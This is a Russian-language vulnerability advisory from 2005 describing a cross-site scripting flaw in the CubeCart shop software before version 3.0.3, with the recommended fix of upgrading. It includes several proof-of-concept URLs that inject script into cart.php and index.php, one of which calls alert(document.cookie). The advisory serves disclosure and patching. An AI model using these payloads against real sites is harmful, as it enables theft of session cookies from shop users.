Security Lab

Межсайтовый скриптинг в CubeCart

Дата публикации:30.09.2005
Всего просмотров:2128
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: CubeCart версии до 3.0.3

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует в сценариях 'cart.php' и 'index.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/cc3/cart.php?act=reg&redir=L3NpdGU
vZGVtby9jYzMvaW5kZXgucGhwP3NlY XJjaFN0c
j0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCU
yOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZp
ZXdDYXQmYW1wO1N1Ym1pdD1Hbw==[XSS-CODE]

http://[target]/cc3/cart.php?act=reg &redir=[XSS-CODE]

http://[target]/cc3/index.php?searchStr=%3D%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript
%3E&act=viewCat&Submit=Go

http://[target]/cc3/i ndex.php?act=login&redir=L3NpdGUvZ
GVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJ
mFtcDtkb2NJZD0x[XSS-CODE]

URL производителя: www.cubecart.com/site/home

Решение: Установите последнюю версию с сайта производителя.

Ссылки: CubeCart Input Validation Bugs in cart.php and index.php Permit Cross-Site Scripting Attacks